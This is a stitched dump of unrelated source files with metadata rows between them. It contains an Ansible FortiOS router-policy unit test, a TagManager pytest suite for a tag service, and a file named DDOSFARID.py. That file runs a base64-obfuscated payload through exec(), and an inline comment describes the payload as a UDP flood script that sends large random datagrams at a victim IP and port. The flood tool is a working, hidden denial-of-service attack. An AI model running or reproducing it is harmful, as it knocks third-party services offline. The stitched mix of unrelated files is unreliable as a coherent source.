'state': 'absent',
'router_policy': {
'action': 'deny',
'comments': 'test_value_4',
'dst_negate': 'enable',
'end_port': '6',
'end_source_port': '7',
'gateway': 'test_value_8',
'output_device': 'test_value_9',
'protocol': '10',
'seq_num': '11',
'src_negate': 'enable',
'start_port': '13',
'start_source_port': '14',
'status': 'enable',
'tos': 'test_value_16',
'tos_mask': 'test_value_17'
},
'vdom': 'root'}
is_error, changed, response = fortios_router_policy.fortios_router(input_data, fos_instance)
delete_method_mock.assert_called_with('router', 'policy', mkey=ANY, vdom='root')
schema_method_mock.assert_not_called()
assert is_error
assert not changed
assert response['status'] == 'error'
assert response['http_status'] == 500
def test_router_policy_idempotent(mocker):
schema_method_mock = mocker.patch('ansible.module_utils.network.fortios.fortios.FortiOSHandler.schema')
set_method_result = {'status': 'error', 'http_method': 'DELETE', 'http_status': 404}
set_method_mock = mocker.patch('ansible.module_utils.network.fortios.fortios.FortiOSHandler.set', return_value=set_method_result)
input_data = {
'username': 'admin',
'state': 'present',
'router_policy': {
'action': 'deny',
'comments': 'test_value_4',
'dst_negate': 'enable',
'end_port': '6',
'end_source_port': '7',
'gateway': 'test_value_8',
'output_device': 'test_value_9',
'protocol': '10',
'seq_num': '11',
'src_negate': 'enable',
'start_port': '13',
'start_source_port': '14',
'status': 'enable',
'tos': 'test_value_16',
'tos_mask': 'test_value_17'
},
'vdom': 'root'}
is_error, changed, response = fortios_router_policy.fortios_router(input_data, fos_instance)
expected_data = {
'action': 'deny',
'comments': 'test_value_4',
'dst-negate': 'enable',
'end-port': '6',
'end-source-port': '7',
'gateway': 'test_value_8',
'output-device': 'test_value_9',
'protocol': '10',
'seq-num': '11',
'src-negate': 'enable',
'start-port': '13',
'start-source-port': '14',
'status': 'enable',
'tos': 'test_value_16',
'tos-mask': 'test_value_17'
}
set_method_mock.assert_called_with('router', 'policy', data=expected_data, vdom='root')
schema_method_mock.assert_not_called()
assert not is_error
assert not changed
assert response['status'] == 'error'
assert response['http_status'] == 404
def test_router_policy_filter_foreign_attributes(mocker):
schema_method_mock = mocker.patch('ansible.module_utils.network.fortios.fortios.FortiOSHandler.schema')
set_method_result = {'status': 'success', 'http_method': 'POST', 'http_status': 200}
set_method_mock = mocker.patch('ansible.module_utils.network.fortios.fortios.FortiOSHandler.set', return_value=set_method_result)
input_data = {
'username': 'admin',
'state': 'present',
'router_policy': {
'random_attribute_not_valid': 'tag',
'action': 'deny',
'comments': 'test_value_4',
'dst_negate': 'enable',
'end_port': '6',
'end_source_port': '7',
'gateway': 'test_value_8',
'output_device': 'test_value_9',
'protocol': '10',
'seq_num': '11',
'src_negate': 'enable',
'start_port': '13',
'start_source_port': '14',
'status': 'enable',
'tos': 'test_value_16',
'tos_mask': 'test_value_17'
},
'vdom': 'root'}
is_error, changed, response = fortios_router_policy.fortios_router(input_data, fos_instance)
expected_data = {
'action': 'deny',
'comments': 'test_value_4',
'dst-negate': 'enable',
'end-port': '6',
'end-source-port': '7',
'gateway': 'test_value_8',
'output-device': 'test_value_9',
'protocol': '10',
'seq-num': '11',
'src-negate': 'enable',
'start-port': '13',
'start-source-port': '14',
'status': 'enable',
'tos': 'test_value_16',
'tos-mask': 'test_value_17'
}
set_method_mock.assert_called_with('router', 'policy', data=expected_data, vdom='root')
schema_method_mock.assert_not_called()
assert not is_error
assert changed
assert response['status'] == 'success'
assert response['http_status'] == 200
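
# A convention runs through every expected_data block above: playbook arguments use
# underscores ('dst_negate') while the FortiOS REST API uses hyphens ('dst-negate').
# A minimal sketch of that key translation (illustrative only; the module under test
# ships its own helper for this):
def underscore_to_hyphen(data):
    if isinstance(data, list):
        return [underscore_to_hyphen(elem) for elem in data]
    if isinstance(data, dict):
        return {k.replace('_', '-'): underscore_to_hyphen(v) for k, v in data.items()}
    return data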
| 34.861765
| 142
| 0.604995
| 1,352
| 11,853
| 5.001479
| 0.139053
| 0.066548
| 0.043478
| 0.048063
| 0.846051
| 0.83703
| 0.822981
| 0.822981
| 0.822981
| 0.822981
| 0
| 0.023893
| 0.251413
| 11,853
| 339
| 143
| 34.964602
| 0.738195
| 0.05602
| 0
| 0.862816
| 0
| 0
| 0.353889
| 0.077866
| 0
| 0
| 0
| 0
| 0.129964
| 1
| 0.025271
| false
| 0
| 0.028881
| 0
| 0.057762
| 0.00361
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 7
| 98d4a6f974fc89484c35fa782c6605edd9a0de88
| 3,148
| py
| Python
| DDOSFARID.py
| DARKFARID13/DDOSWEB
| ba28abaad211098a384394c6fc19f027b5e23fd4
| ["Apache-2.0"] | null | null | null |
| DDOSFARID.py
| DARKFARID13/DDOSWEB
| ba28abaad211098a384394c6fc19f027b5e23fd4
| ["Apache-2.0"] | null | null | null |
| DDOSFARID.py
| DARKFARID13/DDOSWEB
| ba28abaad211098a384394c6fc19f027b5e23fd4
| ["Apache-2.0"] | null | null | null |
import base64
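# The base64 payload below decodes to a Python 2 UDP flood script: it opens a
# socket.SOCK_DGRAM socket and loops, sending random._urandom(20000)-byte datagrams
# at the given victim/port for the given duration. It is left encoded here exactly
# as it appears in the source.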
exec(base64.b64decode('aW1wb3J0IHRpbWUKaW1wb3J0IHNvY2tldAppbXBvcnQgcmFuZG9tCmltcG9ydCBzeXMKZGVmIHVzYWdlKCk6CiAgICBwcmludCAiXDAzM1sxOzMybSMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyIKICAgIHByaW50ICIjLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS1bXDAzM1sxOzkxbUZBUklELURET1NcMDMzWzE7MzJtXS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tIyIKICAgIHByaW50ICIjLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLSMiCiAgICBwcmludCAiIyAgIFwwMzNbMTs5MW1Db21tYW5kOiAiICJweXRob24yIFRhbWZhbkRkb3MucHkgIiAiPGlwPiA8cG9ydD4gPHBhY2tldD4gXDAzM1sxOzMybSAjIgogICAgcHJpbnQgIiMgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICMjIgogICAgcHJpbnQgIiNcMDMzWzE7OTFtQ3JlYXRvcjpNUi5GNFIxRCAgXDAzM1sxOzMybSMjICAgICAgIyAgICAgICMgICAgICAgICAgICAgICAgICAgICAjIyIKICAgIHByaW50ICIjXDAzM1sxOzkxbVRlYW0gICA6IE1DSSAgICAgICAgXDAzM1sxOzMybSMjICAgICAjICAgICAgIyAgICAgICAgICAgICAgICAgICAgICMjIgogICAgcHJpbnQgIiNcMDMzWzE7OTFtVmVyc2lvbjoxLjAgICAgICAgIFwwMzNbMTszMm0jIyAgICAgICMgICAgICAjICAgICAgICAgICAgICAgICAgICAgIyMiCiAgICBwcmludCAiI1wwMzNbMTs5MW1UUUFkbWluOk1SLkY0UjFEWC1NclJhcGhhZWwtTXJUaGVTcGFtLU1yLkRjLU1yQmxhY2tIYXQgICMjIgogICAgcHJpbnQgIiNcMDMzWzE7OTFtICAgICAgIDpMaWtlV2hpdGUtTXJVa25vd24tTXJTYW5jaGV6LU1yQmltYm9uZy1NclRhbWZhbiAjIyIKICAgIHByaW50ICIjICAgICAgICAgICAgICAgICAgICAgXDAzM1sxOzkxbSAjIyAgICAgXDAzM1sxOzMybSMgIFwwMzNbMTs5MW0gIFwwMzNbMTszMiAgICMjIgogICAgcHJpbnQgIiMgICAgICAgICAgICAgICAgICAgICBcMDMzWzE7OTFtIyMgIFwwMzNbMTszMm0jIyMgICBcMDMzWzE7OTFtICBcMDMzWzE7MzJtICAgIyMiCiAgICBwcmludCAiIyAgICAgICAgICAgICAgIFwwMzNbMTs5MW08LS1bTVVTTElNIENZQkVSIElORE9ORVNJQV0tLT4gICAgICAgICBcMDMzWzE7MzJtICAjIyIKICAgIHByaW50ICIjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMiCiAgICBwcmludCAiICAgICBNZW1iZXI6TXIuWmVlWF9JTkQtSy5SLkEuUy1FZWxlaElORC1XaG9BbUktV2V5dC5UbSIKICAgIHByaW50ICIgICAgICAgICAgIFBlbWJ1YXREZG9zMTpNUi5GNFIxRDE5ODcgQ3liZXIgVGVhbSIKICAgIHByaW50ICIgICAgICAgICAgUGVtYnVhdERkb3MyOk11c2xpbSBDeWJlciBJbmRvbmVzaWEiCmRlZiBmbG9vZCh2aWN0aW0sIHZwb3J0LCBkdXJhdGlvbik6CiAgICAjIFN1cHBvcnQgdXMgeWFha2suLi4gOikKICAgICMgT2tleSBKYWRpIGRpc2luaSBzYXlhIG1lbWJ1YXQgc2VydmVyLCBLZXRpa2Egc2F5YSBtZW1hbmdnaWwgIlNPQ0tfREdSQU0iIGl0dSAgbWVudW5qdWtrYW4gIFVEUCB0eXBlIHByb2dyYW0KICAgIGNsaWVudCA9IHNvY2tldC5zb2NrZXQoc29ja2V0LkFGX0lORVQsIHNvY2tldC5TT0NLX0RHUkFNKQogICAgIyAyMDAwMCByZXByZXNlbnRhc2kgc2F0dSBieXRlIGtlIHNlcnZlcgogICAgYnl0ZXMgPSByYW5kb20uX3VyYW5kb20oMjAwMDApCiAgICB0aW1lb3V0ID0gIHRpbWUudGltZSgpICsgZHVyYXRpb24KICAgIHNlbnQgPSAzMDAwCgogICAgd2hpbGUgMToKICAgICAgICBpZiB0aW1lLnRpbWUoKSA+IHRpbWVvdXQ6CiAgICAgICAgICAgIGJyZWFrCiAgICAgICAgZWxzZToKICAgICAgICAgICAgcGFzcwogICAgICAgIGNsaWVudC5zZW5kdG8oYnl0ZXMsICh2aWN0aW0sIHZwb3J0KSkKICAgICAgICBzZW50ID0gc2VudCArIDEKICAgICAgICBwcmludCAiXDAzM1sxOzkxbU1lbXVsYWkgXDAzM1sxOzMybSVzIFwwMzNbMTs5MW1tZW5naXJpbSBwYWtldCBcMDMzWzE7MzJtJXMgXDAzM1sxOzkxbXBhZGEgcG9ydCBcMDMzWzE7MzJtJXMgIiUoc2VudCwgdmljdGltLCB2cG9ydCkKZGVmIG1haW4oKToKICAgIHByaW50IGxlbihzeXMuYXJndikKICAgIGlmIGxlbihzeXMuYXJndikgIT0gNDoKICAgICAgICB1c2FnZSgpCiAgICBlbHNlOgogICAgICAgIGZsb29kKHN5cy5hcmd2WzFdLCBpbnQoc3lzLmFyZ3ZbMl0pLCBpbnQoc3lzLmFyZ3ZbM10pKQoKaWYgX19uYW1lX18gPT0gJ19fbWFpbl9fJzoKICAgIG1haW4oKQoK'))
| 1,574
| 3,134
| 0.996823
| 7
| 3,148
| 448.285714
| 0.857143
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.085188
| 0.000635
| 3,148
| 2
| 3,134
| 1,574
| 0.91227
| 0
| 0
| 0
| 0
| 0
| 0.98698
| 0.98698
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.5
| 0
| 0.5
| 0
| 1
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 10
| 98de5f60f6800964fb0aadbbed321af034f8b7f6
| 109,857
| py
| Python
| tests/tag/test_tagmanager.py
| ni/nisystemlink-clients-python
| 2c76de8c21f8a3c2fe845337fe5a7f8f86ec6eef
| ["MIT"] | 8
| 2020-07-23T16:34:57.000Z
| 2022-02-25T02:43:15.000Z
| tests/tag/test_tagmanager.py
| ni/nisystemlink-clients-python
| 2c76de8c21f8a3c2fe845337fe5a7f8f86ec6eef
| ["MIT"] | 6
| 2020-07-23T16:43:09.000Z
| 2020-12-16T14:29:37.000Z
| tests/tag/test_tagmanager.py
| ni/nisystemlink-clients-python
| 2c76de8c21f8a3c2fe845337fe5a7f8f86ec6eef
| ["MIT"] | 6
| 2020-07-14T22:17:00.000Z
| 2022-03-07T13:05:59.000Z
|
import asyncio
import time
import uuid
from collections import OrderedDict
from datetime import datetime, timedelta, timezone
from unittest import mock
import pytest # type: ignore
from systemlink.clients import core, tag as tbase
from .http.httpclienttestbase import HttpClientTestBase, MockResponse
from ..anyorderlist import AnyOrderList
class TestTagManager(HttpClientTestBase):
def setup_method(self, method):
super().setup_method(method)
def get_client_mock(*args, **kwargs):
return self._client
with mock.patch(
"systemlink.clients.tag._tag_manager.HttpClient", get_client_mock
):
self._uut = tbase.TagManager(object())
def test__metadata_supplied__create_selection__metadata_used_without_query(self):
tags = [
tbase.TagData("tag1"),
tbase.TagData("tag2", tbase.DataType.BOOLEAN),
tbase.TagData(
"tag3", tbase.DataType.DATE_TIME, ["keyword1"], {"prop1": "value1"}
),
]
selection = self._uut.create_selection(tags)
assert self._client.all_requests.call_count == 0
assert [t.path for t in tags] == sorted(selection.paths)
assert tags == list(sorted(selection.metadata.values(), key=(lambda t: t.path)))
assert [t.path for t in tags[1:]] == sorted(selection.values.keys())
assert selection.values[tags[1].path].data_type == tbase.DataType.BOOLEAN
assert selection.values[tags[2].path].data_type == tbase.DataType.DATE_TIME
def test__open_selection__creates_selection_and_queries_tags(self):
path1 = "tag1"
path2 = "tag2"
paths = [path1, path2]
token = uuid.uuid4()
def mock_request(method, uri, params=None, data=None):
if (method, uri) == ("POST", "/nitag/v2/selections"):
ret = dict(data) if data else {}
ret["id"] = token
return ret, MockResponse(method, uri)
elif (method, uri) == ("GET", "/nitag/v2/selections/{id}/tags"):
return (
[
{"type": "BOOLEAN", "path": path1},
{"type": "DOUBLE", "path": path2},
],
MockResponse(method, uri),
)
elif (method, uri) == ("DELETE", "/nitag/v2/selections/{id}"):
return None, MockResponse(method, uri)
else:
assert False, (method, uri)
self._client.all_requests.configure_mock(side_effect=mock_request)
selection = self._uut.open_selection(paths)
assert self._client.all_requests.call_args_list == [
mock.call(
"POST",
"/nitag/v2/selections",
params=None,
data={"searchPaths": AnyOrderList(paths)},
),
mock.call("GET", "/nitag/v2/selections/{id}/tags", params={"id": token}),
]
assert 2 == len(selection.metadata)
@pytest.mark.asyncio
async def test__open_selection_async__creates_selection_and_queries_tags(self):
path1 = "tag1"
path2 = "tag2"
paths = [path1, path2]
token = uuid.uuid4()
def mock_request(method, uri, params=None, data=None):
if (method, uri) == ("POST", "/nitag/v2/selections"):
ret = dict(data) if data else {}
ret["id"] = token
return ret, MockResponse(method, uri)
elif (method, uri) == ("GET", "/nitag/v2/selections/{id}/tags"):
return (
[
{"type": "BOOLEAN", "path": path1},
{"type": "DOUBLE", "path": path2},
],
MockResponse(method, uri),
)
elif (method, uri) == ("DELETE", "/nitag/v2/selections/{id}"):
return None, MockResponse(method, uri)
else:
assert False, (method, uri)
self._client.all_requests.configure_mock(side_effect=mock_request)
selection = await self._uut.open_selection_async(paths)
assert self._client.all_requests.call_args_list == [
mock.call(
"POST",
"/nitag/v2/selections",
params=None,
data={"searchPaths": AnyOrderList(paths)},
),
mock.call("GET", "/nitag/v2/selections/{id}/tags", params={"id": token}),
]
assert 2 == len(selection.metadata)
def test__bad_arguments__open__raises(self):
with pytest.raises(ValueError):
self._uut.open(None)
with pytest.raises(ValueError):
self._uut.open(None, tbase.DataType.BOOLEAN)
with pytest.raises(ValueError):
self._uut.open(None, tbase.DataType.BOOLEAN, create=True)
with pytest.raises(ValueError):
self._uut.open("")
with pytest.raises(ValueError):
self._uut.open("", tbase.DataType.BOOLEAN)
with pytest.raises(ValueError):
self._uut.open("", tbase.DataType.BOOLEAN, create=True)
with pytest.raises(ValueError):
self._uut.open(" ")
with pytest.raises(ValueError):
self._uut.open(" ", tbase.DataType.BOOLEAN)
with pytest.raises(ValueError):
self._uut.open(" ", tbase.DataType.BOOLEAN, create=True)
with pytest.raises(ValueError):
self._uut.open("*")
with pytest.raises(ValueError):
self._uut.open("*", tbase.DataType.BOOLEAN)
with pytest.raises(ValueError):
self._uut.open("*", tbase.DataType.BOOLEAN, create=True)
with pytest.raises(ValueError):
self._uut.open("tag", tbase.DataType.UNKNOWN)
with pytest.raises(ValueError):
self._uut.open("tag", tbase.DataType.UNKNOWN, create=True)
def test__existing_tag__open_without_datatype__retrieves_tag(self):
path = "tag1"
public_properties = {"prop1": "value1", "prop2": "value2"}
all_properties = dict(public_properties)
dummy_tag = tbase.TagData(path)
dummy_tag.retention_type = tbase.RetentionType.COUNT
dummy_tag.retention_count = 7
dummy_tag.retention_days = 9
dummy_tag._copy_retention_properties(all_properties)
keywords = ["keyword1", "keyword2"]
self._client.all_requests.configure_mock(
side_effect=self._get_mock_request(
[
{
"type": "BOOLEAN",
"properties": all_properties,
"path": path,
"keywords": keywords,
"collectAggregates": True,
}
]
)
)
tag = self._uut.open(path)
self._client.all_requests.assert_called_once_with(
"GET", "/nitag/v2/tags/{path}", params={"path": path}
)
assert tag is not None
assert tbase.DataType.BOOLEAN == tag.data_type
assert tag.collect_aggregates is True
assert keywords == sorted(tag.keywords)
assert sorted(public_properties.items()) == sorted(tag.properties.items())
assert dummy_tag.retention_count == tag.retention_count
assert dummy_tag.retention_days == tag.retention_days
assert dummy_tag.retention_type == tag.retention_type
def test__tag_not_found__open_without_datatype__raises(self):
err = core.ApiError()
err.name = "Tag.NoSuchTag"
ex = core.ApiException("404 tag not found", err)
self._client.all_requests.configure_mock(side_effect=ex)
with pytest.raises(core.ApiException) as actual:
self._uut.open("tag")
assert ex is actual.value
self._client.all_requests.assert_called_once_with(
"GET", "/nitag/v2/tags/{path}", params={"path": "tag"}
)
def test__tag_not_found__open_with_datatype__creates_tag(self):
path = "tag"
err = core.ApiError()
err.name = "Tag.NoSuchTag"
self._client.all_requests.configure_mock(
side_effect=self._get_mock_request(
[core.ApiException("404 tag not found", err), None]
)
)
tag = self._uut.open(path, tbase.DataType.UINT64)
assert self._client.all_requests.call_args_list == [
mock.call("GET", "/nitag/v2/tags/{path}", params={"path": "tag"}),
mock.call(
"POST",
"/nitag/v2/tags",
params=None,
data={"path": path, "type": "U_INT64"},
),
]
assert path == tag.path
assert tbase.DataType.UINT64 == tag.data_type
assert not tag.collect_aggregates
assert 0 == len(tag.keywords)
assert 0 == len(tag.properties)
assert tag.retention_count is None
assert tag.retention_days is None
assert tbase.RetentionType.NONE == tag.retention_type
def test__tag_not_found__open_with_create_true__creates_tag(self):
path = "tag"
err = core.ApiError()
err.name = "Tag.NoSuchTag"
self._client.all_requests.configure_mock(
side_effect=self._get_mock_request(
[core.ApiException("404 tag not found", err), None]
)
)
tag = self._uut.open(path, tbase.DataType.UINT64, create=True)
assert self._client.all_requests.call_args_list == [
mock.call("GET", "/nitag/v2/tags/{path}", params={"path": "tag"}),
mock.call(
"POST",
"/nitag/v2/tags",
params=None,
data={"path": path, "type": "U_INT64"},
),
]
assert path == tag.path
assert tbase.DataType.UINT64 == tag.data_type
assert not tag.collect_aggregates
assert 0 == len(tag.keywords)
assert 0 == len(tag.properties)
assert tag.retention_count is None
assert tag.retention_days is None
assert tbase.RetentionType.NONE == tag.retention_type
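
# The call lists in the two tests above document the client's open-or-create handshake:
# a GET that fails with Tag.NoSuchTag is followed by a POST that creates the tag. The
# same flow sketched in isolation (hypothetical `request` helper, not TagManager's real
# code; assumes the exception exposes the ApiError it was built with as `.error`):
def _open_or_create_sketch(request, path, data_type):
    try:
        return request("GET", "/nitag/v2/tags/{path}", params={"path": path})
    except core.ApiException as ex:
        if ex.error is not None and ex.error.name == "Tag.NoSuchTag":
            return request("POST", "/nitag/v2/tags", params=None,
                           data={"path": path, "type": data_type})
        raise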
def test__tag_exists__open__does_not_create_tag(self):
path = "tag1"
public_properties = {"prop1": "value1", "prop2": "value2"}
all_properties = dict(public_properties)
dummy_tag = tbase.TagData(path)
dummy_tag.retention_type = tbase.RetentionType.COUNT
dummy_tag.retention_count = 7
dummy_tag.retention_days = 9
dummy_tag._copy_retention_properties(all_properties)
keywords = ["keyword1", "keyword2"]
self._client.all_requests.configure_mock(
side_effect=self._get_mock_request(
[
{
"type": "BOOLEAN",
"properties": all_properties,
"path": path,
"keywords": keywords,
"collectAggregates": True,
}
]
)
)
tag = self._uut.open(path, tbase.DataType.BOOLEAN, create=True)
self._client.all_requests.assert_called_once_with(
"GET", "/nitag/v2/tags/{path}", params={"path": "tag1"}
)
assert tag is not None
assert tbase.DataType.BOOLEAN == tag.data_type
assert tag.collect_aggregates is True
assert keywords == sorted(tag.keywords)
assert sorted(public_properties.items()) == sorted(tag.properties.items())
assert dummy_tag.retention_count == tag.retention_count
assert dummy_tag.retention_days == tag.retention_days
assert dummy_tag.retention_type == tag.retention_type
def test__tag_not_found__open_with_create_False__raises(self):
err = core.ApiError()
err.name = "Tag.NoSuchTag"
ex = core.ApiException("404 tag not found", err)
self._client.all_requests.configure_mock(side_effect=ex)
with pytest.raises(core.ApiException) as actual:
self._uut.open("tag", tbase.DataType.DOUBLE, create=False)
assert ex is actual.value
self._client.all_requests.assert_called_once_with(
"GET", "/nitag/v2/tags/{path}", params={"path": "tag"}
)
def test__tag_exists_with_different_datatype__open__raises(self):
self._client.all_requests.configure_mock(
side_effect=self._get_mock_request([{"type": "BOOLEAN", "path": "tag"}] * 3)
)
with pytest.raises(core.ApiException):
self._uut.open("tag", tbase.DataType.DOUBLE)
with pytest.raises(core.ApiException):
self._uut.open("tag", tbase.DataType.DOUBLE, create=False)
with pytest.raises(core.ApiException):
self._uut.open("tag", tbase.DataType.DOUBLE, create=True)
assert self._client.all_requests.call_args_list == [
mock.call("GET", "/nitag/v2/tags/{path}", params={"path": "tag"}),
mock.call("GET", "/nitag/v2/tags/{path}", params={"path": "tag"}),
mock.call("GET", "/nitag/v2/tags/{path}", params={"path": "tag"}),
]
@pytest.mark.asyncio
async def test__bad_arguments__open_async__raises(self):
with pytest.raises(ValueError):
await self._uut.open_async(None)
with pytest.raises(ValueError):
await self._uut.open_async(None, tbase.DataType.BOOLEAN)
with pytest.raises(ValueError):
await self._uut.open_async(None, tbase.DataType.BOOLEAN, create=True)
with pytest.raises(ValueError):
await self._uut.open_async("")
with pytest.raises(ValueError):
await self._uut.open_async("", tbase.DataType.BOOLEAN)
with pytest.raises(ValueError):
await self._uut.open_async("", tbase.DataType.BOOLEAN, create=True)
with pytest.raises(ValueError):
await self._uut.open_async(" ")
with pytest.raises(ValueError):
await self._uut.open_async(" ", tbase.DataType.BOOLEAN)
with pytest.raises(ValueError):
await self._uut.open_async(" ", tbase.DataType.BOOLEAN, create=True)
with pytest.raises(ValueError):
await self._uut.open_async("*")
with pytest.raises(ValueError):
await self._uut.open_async("*", tbase.DataType.BOOLEAN)
with pytest.raises(ValueError):
await self._uut.open_async("*", tbase.DataType.BOOLEAN, create=True)
with pytest.raises(ValueError):
await self._uut.open_async("tag", tbase.DataType.UNKNOWN)
with pytest.raises(ValueError):
await self._uut.open_async("tag", tbase.DataType.UNKNOWN, create=True)
@pytest.mark.asyncio
async def test__existing_tag__open_async_without_datatype__retrieves_tag(self):
path = "tag1"
public_properties = {"prop1": "value1", "prop2": "value2"}
all_properties = dict(public_properties)
dummy_tag = tbase.TagData(path)
dummy_tag.retention_type = tbase.RetentionType.COUNT
dummy_tag.retention_count = 7
dummy_tag.retention_days = 9
dummy_tag._copy_retention_properties(all_properties)
keywords = ["keyword1", "keyword2"]
self._client.all_requests.configure_mock(
side_effect=self._get_mock_request(
[
{
"type": "BOOLEAN",
"properties": all_properties,
"path": path,
"keywords": keywords,
"collectAggregates": True,
}
]
)
)
tag = await self._uut.open_async(path)
self._client.all_requests.assert_called_once_with(
"GET", "/nitag/v2/tags/{path}", params={"path": "tag1"}
)
assert tag is not None
assert tbase.DataType.BOOLEAN == tag.data_type
assert tag.collect_aggregates is True
assert keywords == sorted(tag.keywords)
assert sorted(public_properties.items()) == sorted(tag.properties.items())
assert dummy_tag.retention_count == tag.retention_count
assert dummy_tag.retention_days == tag.retention_days
assert dummy_tag.retention_type == tag.retention_type
@pytest.mark.asyncio
async def test__tag_not_found__open_async_without_datatype__raises(self):
err = core.ApiError()
err.name = "Tag.NoSuchTag"
ex = core.ApiException("404 tag not found", err)
self._client.all_requests.configure_mock(side_effect=ex)
with pytest.raises(core.ApiException) as actual:
await self._uut.open_async("tag")
assert ex is actual.value
self._client.all_requests.assert_called_once_with(
"GET", "/nitag/v2/tags/{path}", params={"path": "tag"}
)
@pytest.mark.asyncio
async def test__tag_not_found__open_async_with_datatype__creates_tag(self):
path = "tag"
err = core.ApiError()
err.name = "Tag.NoSuchTag"
self._client.all_requests.configure_mock(
side_effect=self._get_mock_request(
[core.ApiException("404 tag not found", err), None]
)
)
tag = await self._uut.open_async(path, tbase.DataType.UINT64)
assert self._client.all_requests.call_args_list == [
mock.call("GET", "/nitag/v2/tags/{path}", params={"path": "tag"}),
mock.call(
"POST",
"/nitag/v2/tags",
params=None,
data={"path": path, "type": "U_INT64"},
),
]
assert path == tag.path
assert tbase.DataType.UINT64 == tag.data_type
assert not tag.collect_aggregates
assert 0 == len(tag.keywords)
assert 0 == len(tag.properties)
assert tag.retention_count is None
assert tag.retention_days is None
assert tbase.RetentionType.NONE == tag.retention_type
@pytest.mark.asyncio
async def test__tag_not_found__open_async_with_create_true__creates_tag(self):
path = "tag"
err = core.ApiError()
err.name = "Tag.NoSuchTag"
self._client.all_requests.configure_mock(
side_effect=self._get_mock_request(
[core.ApiException("404 tag not found", err), None]
)
)
tag = await self._uut.open_async(path, tbase.DataType.UINT64, create=True)
assert self._client.all_requests.call_args_list == [
mock.call("GET", "/nitag/v2/tags/{path}", params={"path": "tag"}),
mock.call(
"POST",
"/nitag/v2/tags",
params=None,
data={"path": path, "type": "U_INT64"},
),
]
assert path == tag.path
assert tbase.DataType.UINT64 == tag.data_type
assert not tag.collect_aggregates
assert 0 == len(tag.keywords)
assert 0 == len(tag.properties)
assert tag.retention_count is None
assert tag.retention_days is None
assert tbase.RetentionType.NONE == tag.retention_type
@pytest.mark.asyncio
async def test__tag_exists__open_async__does_not_create_tag(self):
path = "tag1"
public_properties = {"prop1": "value1", "prop2": "value2"}
all_properties = dict(public_properties)
dummy_tag = tbase.TagData(path)
dummy_tag.retention_type = tbase.RetentionType.COUNT
dummy_tag.retention_count = 7
dummy_tag.retention_days = 9
dummy_tag._copy_retention_properties(all_properties)
keywords = ["keyword1", "keyword2"]
self._client.all_requests.configure_mock(
side_effect=self._get_mock_request(
[
{
"type": "BOOLEAN",
"properties": all_properties,
"path": path,
"keywords": keywords,
"collectAggregates": True,
}
]
)
)
tag = await self._uut.open_async(path, tbase.DataType.BOOLEAN, create=True)
self._client.all_requests.assert_called_once_with(
"GET", "/nitag/v2/tags/{path}", params={"path": "tag1"}
)
assert tag is not None
assert tbase.DataType.BOOLEAN == tag.data_type
assert tag.collect_aggregates is True
assert keywords == sorted(tag.keywords)
assert sorted(public_properties.items()) == sorted(tag.properties.items())
assert dummy_tag.retention_count == tag.retention_count
assert dummy_tag.retention_days == tag.retention_days
assert dummy_tag.retention_type == tag.retention_type
@pytest.mark.asyncio
async def test__tag_not_found__open_async_with_create_False__raises(self):
err = core.ApiError()
err.name = "Tag.NoSuchTag"
ex = core.ApiException("404 tag not found", err)
self._client.all_requests.configure_mock(side_effect=ex)
with pytest.raises(core.ApiException) as actual:
await self._uut.open_async("tag", tbase.DataType.DOUBLE, create=False)
assert ex is actual.value
self._client.all_requests.assert_called_once_with(
"GET", "/nitag/v2/tags/{path}", params={"path": "tag"}
)
@pytest.mark.asyncio
async def test__tag_exists_with_different_datatype__open_async__raises(self):
self._client.all_requests.configure_mock(
side_effect=self._get_mock_request([{"type": "BOOLEAN", "path": "tag"}] * 3)
)
with pytest.raises(core.ApiException):
await self._uut.open_async("tag", tbase.DataType.DOUBLE)
with pytest.raises(core.ApiException):
await self._uut.open_async("tag", tbase.DataType.DOUBLE, create=False)
with pytest.raises(core.ApiException):
await self._uut.open_async("tag", tbase.DataType.DOUBLE, create=True)
assert self._client.all_requests.call_args_list == [
mock.call("GET", "/nitag/v2/tags/{path}", params={"path": "tag"}),
mock.call("GET", "/nitag/v2/tags/{path}", params={"path": "tag"}),
mock.call("GET", "/nitag/v2/tags/{path}", params={"path": "tag"}),
]
def test__invalid_tags__refresh__raises(self):
with pytest.raises(ValueError):
self._uut.refresh(None)
with pytest.raises(ValueError):
self._uut.refresh([None])
with pytest.raises(ValueError):
self._uut.refresh([tbase.TagData("tag"), None])
with pytest.raises(ValueError):
self._uut.refresh([tbase.TagData("tag"), tbase.TagData(None)])
with pytest.raises(ValueError):
self._uut.refresh([tbase.TagData("tag"), tbase.TagData("")])
def test__multiple_tags_given__refresh__all_tags_updated(self):
path1 = "tag1"
path2 = "tag2"
public_properties = {"prop1": "value1", "prop2": "value2"}
all_properties = dict(public_properties)
dummy_tag = tbase.TagData(path1)
dummy_tag.retention_type = tbase.RetentionType.COUNT
dummy_tag.retention_count = 7
dummy_tag.retention_days = 9
dummy_tag._copy_retention_properties(all_properties)
keywords = ["keyword1", "keyword2"]
self._client.all_requests.configure_mock(
side_effect=self._get_mock_request(
[
{
"totalCount": 2,
"tags": [
{
"type": "BOOLEAN",
"properties": all_properties,
"path": path1,
"keywords": keywords,
